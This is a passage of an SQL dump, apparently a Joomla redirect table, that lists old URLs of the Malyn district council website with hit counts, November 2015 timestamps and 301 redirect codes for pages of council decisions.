00:00:00',301),(16706,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-17-09-2014/864-pro-pogodzhennya-stvorennya-vidokremlenogo-pidrozdilu-malinskogo-miskrajonnogo-teritorialnogo-medichnogo-ob-ednannya','','','',3,0,'2015-11-02 12:26:45','0000-00-00 00:00:00',301),(16707,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-17-09-2014/864-pro-pogodzhennya-stvorennya-vidokremlenogo-pidrozdilu-malinskogo-miskrajonnogo-teritorialnogo-medichnogo-ob-ednannya?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-11-02 12:26:46','0000-00-00 00:00:00',301),(16708,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-17-09-2014/865-pro-vnesennya-zmin-do-pereliku-ob-ektiv-spilnoji-vlasnosti-teritorialnikh-gromad-sil-selishch-malinskogo-rajonu','','','',3,0,'2015-11-02 12:26:48','0000-00-00 00:00:00',301),(16709,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-17-09-2014/865-pro-vnesennya-zmin-do-pereliku-ob-ektiv-spilnoji-vlasnosti-teritorialnikh-gromad-sil-selishch-malinskogo-rajonu?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-11-02 12:26:49','0000-00-00 00:00:00',301),(16710,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-17-09-2014/869-pro-zatverdzhennya-rozporyadzhen-golovi-rajonnoji-radi','','','',4,0,'2015-11-02 12:26:51','0000-00-00 00:00:00',301),(16711,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-17-09-2014/869-pro-zatverdzhennya-rozporyadzhen-golovi-rajonnoji-radi?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-11-02 12:26:52','0000-00-00 00:00:00',301),(16712,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-17-09-2014/871-pro-zatverdzhennya-tekhnichnoji-dokumentatsiji-po-viznachennyu-normativnoji-groshovoji-otsinki-zemelnoji-dilyanki-yaka-nadaetsya-v-orendu-ripenku-m-v','','','',5,0,'2015-11-02 12:26:54','0000-00-00 00:00:00',301),(16713,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-17-09-2014/872-pro-vnesennya-zmin-do-programi-zajnyatosti-naselennya-malinskogo-rajonu-na-period-do-2017roku','','','',7,0,'2015-11-02 12:26:55','0000-00-00 00:00:00',301),(16714,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-17-09-2014/872-pro-vnesennya-zmin-do-programi-zajnyatosti-naselennya-malinskogo-rajonu-na-period-do-2017roku?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-11-02 12:28:03','0000-00-00 00:00:00',301),(16715,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-17-09-2014?limitstart=0','','','',3,0,'2015-11-02 12:28:06','0000-00-00 00:00:00',301),(16716,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-18-09-2015-roku/1203-pro-vinesennya-na-rozglyad-postijnikh-komisij-malinskoji-rajonnoji-radi-pitannya-vnesennya-zmin-do-statutu-kp-tsra-28','','','',6,0,'2015-11-02 12:28:11','0000-00-00 00:00:00',301),(16717,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-19-12-2014-roku/960-pro-zatverdzhennya-rajonnoji-programi-zabezpechennya-vikonannya-malinskoyu-rajonnoyu-derzhavnoyu-administratsieyu-delegovanikh-povnovazhen-na-2015-2017-roki','','','',2,0,'2015-11-02 12:28:23','0000-00-00 00:00:00',301),(16718,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-19-12-2014-roku/961-pro-prijnyattya-u-spilnu-vlasnist-teritorialnikh-gromad-sil-selishch-rajonu-majna','','','',4,0,'2015-11-02 12:28:31','0000-00-00 00:00:00',301),(16719,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-19-12-2014-roku/961-pro-prijnyattya-u-spilnu-vlasnist-teritorialnikh-gromad-sil-selishch-rajonu-majna?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-11-02 12:28:34','0000-00-00 00:00:00',301),(16720,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-19-12-2014-roku/962-pro-vstanovlennya-orendnoji-plati','','','',3,0,'2015-11-02 12:28:37','0000-00-00 00:00:00',301),(16721,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-19-12-2014-roku/962-pro-vstanovlennya-orendnoji-plati?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-11-02 12:28:39','0000-00-00 00:00:00',301),(16722,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-19-12-2014-roku/963-pro-stan-zakonnosti-ta-pravoporyadku-na-teritoriji-malinskogo-rajonu-za-11-misyatsiv-2014-roku','','','',8,0,'2015-11-02 12:28:40','0000-00-00 00:00:00',301),(16723,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-19-12-2014-roku/963-pro-stan-zakonnosti-ta-pravoporyadku-na-teritoriji-malinskogo-rajonu-za-11-misyatsiv-2014-roku?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-11-02 12:28:41','0000-00-00 00:00:00',301),(16724,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-19-12-2014-roku/964-pro-zatverdzhennya-tekhnichnoji-dokumentatsiji-po-viznachennyu-normativnoji-groshovoji-otsinki-zemelnoji-dilyanki-yaka-nadaetsya-v-orendu-gr-baranovskomu-m-m','','','',6,0,'2015-11-02 12:28:43','0000-00-00 00:00:00',301),(16725,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-19-12-2014-roku/965-pro-vnesennya-zmin-do-kompleksnoji-dovgostrokovoji-programi-rozvitku-zemelnikh-vidnosin-ta-okhoroni-zemel-u-malinskomu-rajoni-na-2007-2015-roki','','','',6,0,'2015-11-02 12:28:44','0000-00-00 00:00:00',301),(16726,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-19-12-2014-roku/968-pro-vnesennya-zmin-do-rajonnogo-byudzhetu-na-2014-rik','','','',7,0,'2015-11-02 12:28:47','0000-00-00 00:00:00',301),(16727,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-19-12-2014-roku/968-pro-vnesennya-zmin-do-rajonnogo-byudzhetu-na-2014-rik?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-11-02 12:28:49','0000-00-00 00:00:00',301),(16728,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-19-12-2014-roku/969-pro-zvernennya-do-golovi-zhitomirskoji-oblasnoji-radi-shchodo-vidmini-pogodzhennya-dp-ob-ednana-girnicho-khimichna-kompaniya','','','',18,0,'2015-11-02 12:28:53','0000-00-00 00:00:00',301),(16729,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-19-12-2014-roku/980-pro-vikonannya-planu-roboti-rajonnoji-radi-za-2014-rik-ta-plan-roboti-rajonnoji-radi-na-i-pivrichchya-2015-roku','','','',3,0,'2015-11-02 12:28:58','0000-00-00 00:00:00',301),(16730,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-19-12-2014-roku/980-pro-vikonannya-planu-roboti-rajonnoji-radi-za-2014-rik-ta-plan-roboti-rajonnoji-radi-na-i-pivrichchya-2015-roku?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-11-02 12:29:00','0000-00-00 00:00:00',301),(16731,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-19-12-2014-roku/981-pro-zatverdzhennya-programi-rozvitku-malogo-i-serednogo-pidpriemnitstva-malinskogo-rajonu-na-2015-2016-roki','','','',3,0,'2015-11-02 12:29:02','0000-00-00 00:00:00',301),(16732,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-19-12-2014-roku/981-pro-zatverdzhennya-programi-rozvitku-malogo-i-serednogo-pidpriemnitstva-malinskogo-rajonu-na-2015-2016-roki?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-11-02 12:29:05','0000-00-00 00:00:00',301),(16733,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-19-12-2014-roku/982-pro-programu-zabezpechennya-deputatskoji-diyalnosti-na-2015-rik','','','',4,0,'2015-11-02 12:29:11','0000-00-00 00:00:00',301),(16734,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-19-12-2014-roku/982-pro-programu-zabezpechennya-deputatskoji-diyalnosti-na-2015-rik?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-11-02 12:29:16','0000-00-00 00:00:00',301),(16735,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-19-12-2014-roku/983-pro-zatverdzhennya-rozporyadzhennya-golovi-rajonnoji-derzhavnoji-administratsiji','','','',6,0,'2015-11-02 12:29:18','0000-00-00 00:00:00',301),(16736,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-19-12-2014-roku/983-pro-zatverdzhennya-rozporyadzhennya-golovi-rajonnoji-derzhavnoji-administratsiji?tmpl=component&print=1&layout=default&page=','','','',6,0,'2015-11-02 12:29:19','0000-00-00 00:00:00',301),(16737,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-19-12-2014-roku/985-pro-zatverdzhennya-strukturi-ta-chiselnosti-vikonavchogo-aparatu-radi-vitrat-na-jogo-utrimannya?tmpl=component&print=1&layout=default&page=','','','',6,0,'2015-11-02 12:29:21','0000-00-00 00:00:00',301),(16738,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-19-12-2014-roku/998-pro-zatverdzhennya-poryadku-i-normativiv-vidrakhuvannya-chastini-pributku-dokhodu','','','',9,0,'2015-11-02 12:29:22','0000-00-00 00:00:00',301),(16739,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-19-12-2014-roku/999-pro-rajonnij-byudzhet-na-2015-rik?tmpl=component&print=1&layout=default&page=','','','',6,0,'2015-11-02 12:29:25','0000-00-00 00:00:00',301),(16740,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-19-12-2014-roku?limitstart=0','','','',3,0,'2015-11-02 12:29:27','0000-00-00 00:00:00',301),(16741,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-20-05-2015-roku/1087-pro-plan-roboti-rajonnoji-radi-na-ii-pivrichchya-2015-roku','','','',3,0,'2015-11-02 12:29:29','0000-00-00 00:00:00',301),(16742,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-20-05-2015-roku/1087-pro-plan-roboti-rajonnoji-radi-na-ii-pivrichchya-2015-roku?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-11-02 12:29:32','0000-00-00 00:00:00',301),(16743,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-20-05-2015-roku/1089-pro-zatverdzhennya-rozporyadzhennya-golovi-rajonnoji-derzhavnoji-administratsiji','','','',3,0,'2015-11-02 12:29:34','0000-00-00 00:00:00',301),(16744,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-20-05-2015-roku/1089-pro-zatverdzhennya-rozporyadzhennya-golovi-rajonnoji-derzhavnoji-administratsiji?tmpl=component&print=1&layout=default&page=','','','',2,0,'2015-11-02 12:29:35','0000-00-00 00:00:00',301),(16745,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-20-05-2015-roku/1090-pro-zatverdzhennya-rozporyadzhen-golovi-rajonnoji-radi','','','',3,0,'2015-11-02 12:29:44','0000-00-00 00:00:00',301),(16746,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-25-02-2015-roku/1010-pro-zatverdzhennya-zvitu-pro-vikonannya-rajonnogo-byudzhetu-za-2014-rik','','','',4,0,'2015-11-02 12:29:50','0000-00-00 00:00:00',301),(16747,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-25-02-2015-roku/1021-pro-zatverdzhennya-programi-sotsialnoji-pidtrimki-vnutrishno-peremishchenikh-osib?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-11-02 12:29:53','0000-00-00 00:00:00',301),(16748,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-26-11-2014-roku/69-rishennya-vid-26-11-2014-roku/940-pro-vnesennya-zmin-do-rajonnogo-byudzhetu-na-2014-rik?tmpl=component&print=1&layout=default&page=','','','',6,0,'2015-11-02 12:30:02','0000-00-00 00:00:00',301),(16749,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-26-11-2014-roku/69-rishennya-vid-26-11-2014-roku?start=14','','','',7,0,'2015-11-02 12:30:07','0000-00-00 00:00:00',301),(16750,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-26-11-2014-roku/69-rishennya-vid-26-11-2014-roku?start=7','','','',6,0,'2015-11-02 12:30:09','0000-00-00 00:00:00',301),(16751,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-27-03-2015-roku/1050-pro-rajonnu-programu-rozvitku-ta-utrimannya-avtomobilnikh-dorig-na-teritoriji-malinskogo-rajonu-na-2015-2017-roki','','','',6,0,'2015-11-02 12:30:17','0000-00-00 00:00:00',301),(16752,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-27-03-2015-roku/1051-pro-zakhodi-shchodo-zberezhennya-isnuyuchoji-merezhi-avtomobilnikh-dorig-rajonu','','','',6,0,'2015-11-02 12:30:19','0000-00-00 00:00:00',301),(16753,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-27-03-2015-roku/1051-pro-zakhodi-shchodo-zberezhennya-isnuyuchoji-merezhi-avtomobilnikh-dorig-rajonu?tmpl=component&print=1&layout=default&page=','','','',6,0,'2015-11-02 12:30:20','0000-00-00 00:00:00',301),(16754,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-27-03-2015-roku/1052-pro-dostrokove-pripinennya-povnovazhen-zastupnika-golovi-rajonnoji-radi-levkovtsya-m-s','','','',6,0,'2015-11-02 12:30:24','0000-00-00 00:00:00',301),(16755,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-27-03-2015-roku/1052-pro-dostrokove-pripinennya-povnovazhen-zastupnika-golovi-rajonnoji-radi-levkovtsya-m-s?tmpl=component&print=1&layout=default&page=','','','',6,0,'2015-11-02 12:30:28','0000-00-00 00:00:00',301),(16756,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-27-03-2015-roku/1053-pro-zvernennya-do-zhitomirskoji-oblasnoji-radi?tmpl=component&print=1&layout=default&page=','','','',6,0,'2015-11-02 12:30:34','0000-00-00 00:00:00',301),(16757,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=681:16-13-&catid=11&lang=uk','','','',5,0,'2015-11-02 12:30:56','0000-00-00 00:00:00',301),(16758,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=681:16-13-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',5,0,'2015-11-02 12:30:58','0000-00-00 00:00:00',301),(16759,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=682:-2012-&catid=42&Itemid=80&lang=uk','','','',5,0,'2015-11-02 12:31:01','0000-00-00 00:00:00',301),(16760,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=688:2012-05-25-16-34-51&catid=11&lang=uk','','','',5,0,'2015-11-02 12:31:08','0000-00-00 00:00:00',301),(16761,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=688:2012-05-25-16-34-51&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',5,0,'2015-11-02 12:31:10','0000-00-00 00:00:00',301),(16762,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=689:2012-05-29-17-48-13&catid=11&lang=en','','','',5,0,'2015-11-02 12:31:12','0000-00-00 00:00:00',301),(16763,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=689:2012-05-29-17-48-13&catid=11&lang=ru','','','',5,0,'2015-11-02 12:31:17','0000-00-00 00:00:00',301),(16764,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=689:2012-05-29-17-48-13&catid=11&lang=uk','','','',5,0,'2015-11-02 12:31:19','0000-00-00 00:00:00',301),(16765,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=689:2012-05-29-17-48-13&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',5,0,'2015-11-02 12:31:20','0000-00-00 00:00:00',301),(16766,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=690:2012-05-29-18-50-09&catid=11&lang=uk','','','',5,0,'2015-11-02 12:31:23','0000-00-00 00:00:00',301),(16767,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=692:-2012&catid=11&lang=uk','','','',5,0,'2015-11-02 12:31:26','0000-00-00 00:00:00',301),(16768,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=696:-14-6-&catid=11&lang=uk','','','',5,0,'2015-11-02 12:31:27','0000-00-00 00:00:00',301),(16769,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=6:2010-06-05-14-26-47&catid=6:2010-06-05-12-52-17&Itemid=9&lang=uk','','','',8,0,'2015-11-02 12:31:28','0000-00-00 00:00:00',301),(16770,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=733:-10-&catid=11&lang=en','','','',5,0,'2015-11-02 12:32:31','0000-00-00 00:00:00',301),(16771,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=733:-10-&catid=11&lang=en&Itemid=','','','',5,0,'2015-11-02 12:32:33','0000-00-00 00:00:00',301),(16772,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=733:-10-&catid=11&lang=ru','','','',5,0,'2015-11-02 12:32:35','0000-00-00 00:00:00',301),(16773,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=733:-10-&catid=11&lang=ru&Itemid=','','','',5,0,'2015-11-02 12:32:38','0000-00-00 00:00:00',301),(16774,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=733:-10-&catid=11&lang=uk','','','',5,0,'2015-11-02 12:32:44','0000-00-00 00:00:00',301),(16775,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=733:-10-&catid=11&lang=uk&Itemid=','','','',5,0,'2015-11-02 12:32:48','0000-00-00 00:00:00',301),(16776,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=733:-10-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',5,0,'2015-11-02 12:32:50','0000-00-00 00:00:00',301),(16777,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=734:-6-2012-&catid=11&lang=en','','','',5,0,'2015-11-02 12:32:51','0000-00-00 00:00:00',301),(16778,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=734:-6-2012-&catid=11&lang=en&Itemid=','','','',5,0,'2015-11-02 12:32:53','0000-00-00 00:00:00',301),(16779,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=734:-6-2012-&catid=11&lang=ru','','','',5,0,'2015-11-02 12:32:54','0000-00-00 00:00:00',301),(16780,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=734:-6-2012-&catid=11&lang=ru&Itemid=','','','',5,0,'2015-11-02 12:32:58','0000-00-00 00:00:00',301),(16781,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=734:-6-2012-&catid=11&lang=uk','','','',5,0,'2015-11-02 12:33:00','0000-00-00 00:00:00',301),(16782,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=734:-6-2012-&catid=11&lang=uk&Itemid=','','','',5,0,'2015-11-02 12:33:02','0000-00-00 00:00:00',301),(16783,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=734:-6-2012-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',5,0,'2015-11-02 12:33:04','0000-00-00 00:00:00',301),(16784,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=737:2012-07-18-13-36-46&catid=43:--25072012-&Itemid=82&lang=en','','','',5,0,'2015-11-02 12:33:09','0000-00-00 00:00:00',301),(16785,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=737:2012-07-18-13-36-46&catid=43:--25072012-&Itemid=82&lang=ru','','','',5,0,'2015-11-02 12:33:15','0000-00-00 00:00:00',301),(16786,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=737:2012-07-18-13-36-46&catid=43:--25072012-&Itemid=82&lang=uk','','','',5,0,'2015-11-02 12:33:17','0000-00-00 00:00:00',301),(16787,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=739:2012-07-23-12-44-57&catid=11&lang=en','','','',5,0,'2015-11-02 12:33:18','0000-00-00 00:00:00',301),(16788,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=739:2012-07-23-12-44-57&catid=11&lang=en&Itemid=','','','',5,0,'2015-11-02 12:33:20','0000-00-00 00:00:00',301),(16789,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=739:2012-07-23-12-44-57&catid=11&lang=ru','','','',5,0,'2015-11-02 12:33:21','0000-00-00 00:00:00',301),(16790,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=739:2012-07-23-12-44-57&catid=11&lang=ru&Itemid=','','','',5,0,'2015-11-02 12:33:23','0000-00-00 00:00:00',301),(16791,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=739:2012-07-23-12-44-57&catid=11&lang=uk','','','',5,0,'2015-11-02 12:33:24','0000-00-00 00:00:00',301),(16792,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=739:2012-07-23-12-44-57&catid=11&lang=uk&Itemid=','','','',5,0,'2015-11-02 12:33:25','0000-00-00 00:00:00',301),(16793,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=739:2012-07-23-12-44-57&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',5,0,'2015-11-02 12:33:29','0000-00-00 00:00:00',301),(16794,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=742:-14-&catid=11&lang=en','','','',5,0,'2015-11-02 12:33:47','0000-00-00 00:00:00',301),(16795,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=742:-14-&catid=11&lang=uk','','','',5,0,'2015-11-02 12:33:49','0000-00-00 00:00:00',301),(16796,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=744:2012-07-28-09-50-03&catid=11&lang=uk','','','',5,0,'2015-11-02 12:33:53','0000-00-00 00:00:00',301),(16797,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=749:2012-08-24-05-59-17&catid=11&lang=uk','','','',5,0,'2015-11-02 12:34:04','0000-00-00 00:00:00',301),(16798,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=762:-210-&catid=11&lang=en','','','',5,0,'2015-11-02 12:34:51','0000-00-00 00:00:00',301),(16799,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=762:-210-&catid=11&lang=en&Itemid=','','','',5,0,'2015-11-02 12:34:55','0000-00-00 00:00:00',301),(16800,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=762:-210-&catid=11&lang=en&Itemid=0','','','',5,0,'2015-11-02 12:34:57','0000-00-00 00:00:00',301),(16801,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=762:-210-&catid=11&lang=ru','','','',5,0,'2015-11-02 12:34:59','0000-00-00 00:00:00',301),(16802,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=762:-210-&catid=11&lang=ru&Itemid=','','','',5,0,'2015-11-02 12:35:01','0000-00-00 00:00:00',301),(16803,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=762:-210-&catid=11&lang=uk','','','',5,0,'2015-11-02 12:35:04','0000-00-00 00:00:00',301),(16804,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=762:-210-&catid=11&lang=uk&Itemid=','','','',5,0,'2015-11-02 12:35:06','0000-00-00 00:00:00',301),(16805,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=762:-210-&catid=11&lang=uk&Itemid=0','','','',5,0,'2015-11-02 12:35:08','0000-00-00 00:00:00',301),(16806,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=766:2012-09-28-08-37-31&catid=11&lang=uk','','','',5,0,'2015-11-02 12:35:13','0000-00-00 00:00:00',301),(16807,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=767:2012-10-01-08-20-30&catid=11&lang=en','','','',7,0,'2015-11-02 12:35:18','0000-00-00 00:00:00',301),(16808,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=767:2012-10-01-08-20-30&catid=11&lang=uk','','','',5,0,'2015-11-02 12:35:22','0000-00-00 00:00:00',301),(16809,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=770:-2012-2015-&catid=45&Itemid=84&lang=uk','','','',5,0,'2015-11-02 12:35:25','0000-00-00 00:00:00',301),(16810,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=773:2012-10-02-06-48-57&catid=45&Itemid=84&lang=uk','','','',5,0,'2015-11-02 12:35:45','0000-00-00 00:00:00',301),(16811,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=774:2012-10-02-09-30-45&catid=45&Itemid=84&lang=ru','','','',5,0,'2015-11-02 12:35:50','0000-00-00 00:00:00',301),(16812,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=774:2012-10-02-09-30-45&catid=45&Itemid=84&lang=uk','','','',7,0,'2015-11-02 12:35:52','0000-00-00 00:00:00',301),(16813,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=784:-9-&catid=11&lang=uk','','','',5,0,'2015-11-02 12:36:00','0000-00-00 00:00:00',301),(16814,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=789:-2012-2014-&catid=45&Itemid=84&lang=uk','','','',5,0,'2015-11-02 12:36:04','0000-00-00 00:00:00',301),(16815,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=793:2012-10-17-06-29-27&catid=45&Itemid=84&lang=uk','','','',5,0,'2015-11-02 12:36:08','0000-00-00 00:00:00',301),(16816,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=795:-20-2011-108-l-r-&catid=45&Itemid=84&lang=en','','','',5,0,'2015-11-02 12:36:11','0000-00-00 00:00:00',301),(16817,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=795:-20-2011-108-l-r-&catid=45&Itemid=84&lang=uk','','','',5,0,'2015-11-02 12:36:14','0000-00-00 00:00:00',301),(16818,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=7:2010-06-05-14-44-23&catid=2&Itemid=5&lang=uk','','','',5,0,'2015-11-02 12:36:32','0000-00-00 00:00:00',301),(16819,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=7:2010-06-05-14-44-23&catid=2:2010-06-05-12-50-39&Itemid=5&lang=en','','','',5,0,'2015-11-02 12:36:34','0000-00-00 00:00:00',301),(16820,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=7:2010-06-05-14-44-23&catid=2:2010-06-05-12-50-39&Itemid=5&lang=ru','','','',5,0,'2015-11-02 12:36:37','0000-00-00 00:00:00',301),(16821,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=7:2010-06-05-14-44-23&catid=2:2010-06-05-12-50-39&Itemid=5&lang=uk','','','',5,0,'2015-11-02 12:36:38','0000-00-00 00:00:00',301),(16822,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=802:-i-i-i-i-i&catid=11&lang=en','','','',5,0,'2015-11-02 12:36:43','0000-00-00 00:00:00',301),(16823,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=802:-i-i-i-i-i&catid=11&lang=ru','','','',5,0,'2015-11-02 12:36:47','0000-00-00 00:00:00',301),(16824,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=802:-i-i-i-i-i&catid=11&lang=uk','','','',5,0,'2015-11-02 12:36:50','0000-00-00 00:00:00',301),(16825,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=802:-i-i-i-i-i&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',5,0,'2015-11-02 12:36:51','0000-00-00 00:00:00',301),(16826,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=802:-i-i-i-i-i&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',5,0,'2015-11-02 12:36:54','0000-00-00 00:00:00',301),(16827,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=804:2012-10-28-18-37-40&catid=11&lang=uk','','','',5,0,'2015-11-02 12:36:57','0000-00-00 